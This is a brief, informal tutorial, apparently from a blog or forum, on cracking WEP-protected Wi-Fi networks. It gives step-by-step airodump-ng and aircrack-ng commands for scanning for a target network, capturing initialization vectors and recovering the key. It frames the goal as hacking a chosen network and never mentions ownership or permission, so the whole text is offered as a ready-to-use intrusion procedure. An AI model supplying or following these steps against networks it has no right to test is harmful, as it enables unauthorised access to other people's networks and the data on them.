WEP CRACKING

Here I am going to tell how to crack the wifi network which is using a WEP for securing the wireless network.


The tools which we required for doing this are

1)airodump

2)aircrack

lets see how to play with these tools...


Frist you need to know few basic information about your device and working features.

* You need to know your interface of your wireless card and mac address

*You need to know which network you need to hack(WEP PROTECTED NETWORK)
After you get these details you can start .



STEP 1: Using AIRODUMP
Command: airodump-ng (your wireless interface name)
Now it will start to scan the wifi signals which is in you range. Look for the WEP protected network. After finding a network note down the following detail about that network
#channel number
#bssid name


STEP 2: COLLECTING THE IVs USING AIRODUMP
Command: airodump-ng -c(channel number) -w(any file name to dump ur ivs) --bssid(bssid name) [your interface name(eth0 or eth1)]


STEP 3: CRACKING THE CAPTURED FILE
You have to collect at least 10000IVs to execute this command

Command : aircrack-ng -b(bssid name) (your file name it should be with the ext .cap)




THATS IT YOUR DONE WITH IT.


The process time will vary with the PNR, DATA,KEY LENGTH.
